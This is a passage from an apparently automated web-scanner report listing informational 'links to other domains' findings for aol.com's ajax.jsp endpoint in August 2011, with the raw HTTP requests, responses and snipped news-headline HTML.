<li ><a name="om_dl13_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl13|sec3_lnk3|87524" href="http://www.autoblog.com/2011/08/05/dodge-durango-smacks-around-ford-explorer-in-latest-tv-ads/">Popular Ford Ripped in Two New Ads</a>
...[SNIP]...

6.8. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl3

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-62.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2334
Set-Cookie: JSESSIONID=5171F8DE5E1C0C6ADA310F19A4EFAF2D; Path=/aol
Content-Length: 2334

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl4 plid-87593 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl4_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl4|sec1_lnk1|87593" href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/"><img height="217" alt="Kat Von D" width="386" src="http://i.huffpost.com/gen/332787/thumbs/a-KAT-VON-D-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl4_hdln" href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl4|sec1_lnk2|87593">Kat Von D Is Dealt Another Blow
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl4_cpy" href="http://www.aoltv.com/2011/08/18/la-ink-canceled-by-tlc/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl4|sec1_lnk3|87593">Bad news that doesn't just hurt her
</a>
...[SNIP]...
<li ><a name="om_dl4_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl4|sec3_lnk1|87593" href="http://www.aoltv.com/2011/08/18/sarah-silverman-nbc-pilot/">Raunchy Comedian Headed to NBC
</a>
...[SNIP]...
<li ><a name="om_dl4_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl4|sec3_lnk2|87593" href="http://www.huffingtonpost.com/2011/08/18/betty-white-is-americas-most-trusted-celebrity_n_930740.html">Most Trusted Celeb in America Is ...
</a>
...[SNIP]...
<li ><a name="om_dl4_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl4|sec3_lnk3|87593" href="http://www.spinner.com/2011/08/18/kanye-west-amy-winehouse-cover/">Kanye West to Cover Winehouse?
</a>
...[SNIP]...

6.9. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=22&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl22

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-43.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2436
Set-Cookie: JSESSIONID=A6301CF306A8999CE66D211457018045; Path=/aol
Content-Length: 2436

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl22 plid-87527 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl22_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl22|sec1_lnk1|87527" href="http://www.stylelist.com/2011/08/18/jenna-lyons-office-photos_n_929919.html"><img height="217" alt="Jenna Lyons in Office" width="386" src="http://o.aolcdn.com/hss/storage/adam/4654db7733606e6b2c325f67ea6a8d38/jenna-lyons-j-crew-office-386kk.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl22_hdln" href="http://www.stylelist.com/2011/08/18/jenna-lyons-office-photos_n_929919.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl22|sec1_lnk2|87527">We Looked Inside the J. Crew Office
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl22_cpy" href="http://www.stylelist.com/2011/08/18/jenna-lyons-office-photos_n_929919.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl22|sec1_lnk3|87527">What you won't see in the stores</a>
...[SNIP]...
<li ><a name="om_dl22_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl22|sec3_lnk1|87527" href="http://www.stylelist.com/2011/08/18/fashion-intern-diaries_n_929384.html">Interns Reveal Fashion's Secrets</a>
...[SNIP]...
<li ><a name="om_dl22_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl22|sec3_lnk2|87527" href="http://www.stylelist.com/2011/08/18/demi-moore-ghost_n_929542.html">Famous Demi Moore Look Inspires</a>
...[SNIP]...
<li ><a name="om_dl22_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl22|sec3_lnk3|87527" href="http://www.stylelist.com/2011/08/18/w-magazine-september-issue_n_929997.html">Behind the Scenes of Mag's Cover</a>
...[SNIP]...

6.10. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html, */*; q=0.01
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/?r=404
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: dlact=dl7; rrpmo1=rr1~1~1313709994071~0; stips5=1; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_vi=[CS]v1|2726CFD6851D2017-600001416006DA93[CE]; s_pers=%20s_getnr%3D1313710009932-New%7C1376782009932%3B%20s_nrgvo%3DNew%7C1376782009933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 23:27:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-91.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2474
Set-Cookie: JSESSIONID=02B1F250AA5AFDB863938536E2691A3D; Path=/aol
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Length: 2474

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-87589 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|87589" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html"><img height="217" alt="Norway Attacks" width="386" src="http://i.huffpost.com/gen/332778/thumbs/a-NORWAY-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|87589">New Details in Norway Massacre
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.huffingtonpost.com/2011/08/18/norway-attacks-anders-behring-breivik-called-police_n_930617.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|87589">Who he dialed (& hung up on) twice
</a>
...[SNIP]...
<li ><a name="om_dl7_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl7|sec3_lnk1|87589" href="http://www.foxnews.com/world/2011/08/18/israel-radio-says-second-bus-attacked-by-gunfire/">Israel Attacked by 'Terror Squad'</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|87589" href="http://www.huffingtonpost.com/2011/08/18/texas-drought-2011-town_n_930308.html">US City May Run Out of Water</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|87589" href="http://www.huffingtonpost.com/2011/08/18/jon-stewart-rips-ed-schultz_n_930618.html">Jon Stewart Rips Into Ed Schultz</a>
...[SNIP]...

6.11. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=2&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2585
Set-Cookie: JSESSIONID=B92B7293052AC58647149B705F4817A1; Path=/aol
Content-Length: 2585

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl2 plid-87611 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl2_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl2|sec1_lnk1|87611" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/"><img height="217" alt="Mary Ingalls on 'Prairie'" width="386" src="http://o.aolcdn.com/hss/storage/adam/ccb1b5a053b320c237c4b35debfacdf4/tmz2-386az08182011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl2_hdln" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl2|sec1_lnk2|87611">Remember Mary Ingalls on 'Prairie'?


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl2_cpy" href="http://www.tmz.com/2011/08/18/mary-ingalls-melissa-sue-anderson-little-house-on-the-prairie-memba-her-gorwn-up/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl2|sec1_lnk3|87611">She still looks angelic today at 48
</a>
...[SNIP]...
<li ><a name="om_dl2_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl2|sec3_lnk1|87611" href="http://www.huffingtonpost.com/2011/08/18/chaz-bono-becoming-chaz-emmy-nominations-beard_n_930324.html">Chaz Bono's Post-Sex Change Beard

</a>
...[SNIP]...
<li ><a name="om_dl2_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl2|sec3_lnk2|87611" href="http://www.huffingtonpost.com/2011/08/18/jerry-springer-sean-hannity_n_930477.html">Jerry Springer Ripped Into TV Host
</a>
...[SNIP]...
<li ><a name="om_dl2_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl2|sec3_lnk3|87611" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/">Report: Another Fatal Stage Collapse</a>
...[SNIP]...

6.12. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=12&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl12

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2805
Set-Cookie: JSESSIONID=A0EE6086337403D6DF93310AE04A902E; Path=/aol
Content-Length: 2805

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl12 plid-87526 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl12_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl12|sec1_lnk1|87526" href="http://www.whattoexpect.com/toddler/photo-gallery/fast-ways-to-stop-toddler-tantrums.aspx?xid=aol_wte-preg_2-_20110815&amp;aolcat=HLT#/slide-1"><img height="217" alt="Child Crying" width="386" src="http://i.huffpost.com/gen/332395/thumbs/a-TANTRUM-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl12_hdln" onclick=" " href="http://www.whattoexpect.com/toddler/photo-gallery/fast-ways-to-stop-toddler-tantrums.aspx?xid=aol_wte-preg_2-_20110815&amp;aolcat=HLT#/slide-1" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl12|sec1_lnk2|87526">Fast Ways to Stop Those Tantrums</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl12_cpy" href="http://www.whattoexpect.com/toddler/photo-gallery/fast-ways-to-stop-toddler-tantrums.aspx?xid=aol_wte-preg_2-_20110815&amp;aolcat=HLT#/slide-1" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl12|sec1_lnk3|87526">Trick to end with loud screaming</a>
...[SNIP]...
<li ><a name="om_dl12_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl12|sec3_lnk1|87526" href="http://www.everydayhealth.com/type-2-diabetes-pictures/joy-bauer-foods-to-avoid-when-you-have-diabetes.aspx?xid=aol_eh-endo_39-_20110815&amp;aolcat=APS">9 Foods Diabetics Should Avoid </a>
...[SNIP]...
<li ><a name="om_dl12_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl12|sec3_lnk2|87526" href="http://www.everydayhealth.com/womens-health/0818/annual-pap-tests-often-ordered-but-unneeded.aspx?xid=aol_eh-news_29-_20110815&amp;aolcat=HLT">New Findings on Annual Pap Test </a>
...[SNIP]...
<li ><a name="om_dl12_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl12|sec3_lnk3|87526" href="http://www.everydayhealth.com/lung-cancer/0818/sniffer-dogs-spot-early-stage-lung-cancer.aspx?xid=aol_eh-news_30-_20110815&amp;aolcat=HLT">Can Dogs Sniff Out Lung Cancer?</a>
...[SNIP]...

6.13. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=10&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:36 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-51.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2809
Set-Cookie: JSESSIONID=374CB13FC53E46BE0AEA32117E821D99; Path=/aol
Content-Length: 2809

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl10 plid-87550 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl10_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl10|sec1_lnk1|87550" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl"><img height="217" alt="Georgetown coach John Thompson III pulled the Hoyas off the court in Beijing on Thursday after a bench-clearing brawl erupted during the fourth quarter of an exhibition game against the Bayi Rockets." width="386" src="http://i.huffpost.com/gen/332650/thumbs/a-CHINABRAWL-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl10_hdln" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl10|sec1_lnk2|87550">Georgetown-China Game Ends in Brawl</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl10_cpy" href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl10|sec1_lnk3|87550">Watch: It spirals out of control quickly</a>
...[SNIP]...
<li ><a name="om_dl10_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl10|sec3_lnk1|87550" href="http://www.huffingtonpost.com/2011/08/18/hideki-irabus-cause-of-death_n_930463.html">Coroner: Ex-Yankee Killed Himself</a>
...[SNIP]...
<li ><a name="om_dl10_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl10|sec3_lnk2|87550" href="http://aol.sportingnews.com/sport/story/2011-08-18/tiger-woods-lebron-james-accused-of-being-cheap-tippers">Tiger and LeBron Called Cheap Tippers</a>
...[SNIP]...
<li ><a name="om_dl10_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl10|sec3_lnk3|87550" href="http://www.mmafighting.com/2011/08/18/ufc-and-fox-officially-announce-details-of-landmark-7-year-broad/">UFC Confirms Major New TV Deal</a>
...[SNIP]...

6.14. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-100.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=E7A04E3CBE28F4E972AC4DDE0CD37F71; Path=/aol
Content-Length: 12307

<div id="local-module" class="gmod mnid-local plid-87491">
<div id="localheader">

<h2>Local News and Weather</h2>

<div id="localstories_location" class="localeditspace">
<div class="citySta
...[SNIP]...
<a href="" name="om_localclose" id="locationclose" class="lnid-sec1_lnk4 sprite"><img src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="Cancel"></a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk1 tooltips" name="om_local_1" href="http://www.nbcdfw.com/news/local/Hunt-Co-Brush-Fire-Burning-Several-Acres-128037173.html" target='_blank' >Brush Fire Burns Several Acres in Hunt Co.</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk2 tooltips" name="om_local_2" href="http://dfw.cbslocal.com/2011/08/18/good-samaritan-fights-current-to-save-drowning-boy/" target='_blank' >Good Samaritan Fights Current To Save...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk3 tooltips" name="om_local_3" href="http://www.cbssports.com/nfl/story/15450124/mcmahon-former-players-sue-nfl-over-concussions/rss" target='_blank' >McMahon, former players sue NFL over...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk4 tooltips" name="om_local_4" href="http://www.nbcdfw.com/news/politics/Ron-Paul-Fan-Looking-for-Dirt-on-Rick-Perry-128013098.html" target='_blank' >Ron Paul Fan Digging for Dirt on Rick...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk5 tooltips" name="om_local_5" href="http://www.nbcdfw.com/weather/stories/Dallas-Facing-Water-Problems-if-Drought-Continues-128032383.html" target='_blank' >Dallas Facing Water Problems if Drought...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk6 tooltips" name="om_local_6" href="http://www.star-telegram.com/2011/08/18/3299308/eastbound-i-30-at-lockheed-blvd.html" target='_blank' >Eastbound I-30 at Lockheed Blvd. in Fort...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk7 tooltips" name="om_local_7" href="http://www.nbcdfw.com/news/local/Threats-Against-Priests-Prompt-Warning-From-Ft-Worth-Diocese-128024113.html" target='_blank' >Threats Against Priests Prompt Warning</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk8 tooltips" name="om_local_8" href="http://www.nbcdfw.com/news/local/Restaurant-Customers-Rally-for-Former-Waitress-128025963.html" target='_blank' >Restaurant Customers Rally for Former...</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather1" class="lnid-sec4_lnk1">
<img alt="Mostly Clear"
title="Mostly Clear"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather2" class="lnid-sec4_lnk2">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather3" class="lnid-sec4_lnk3">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
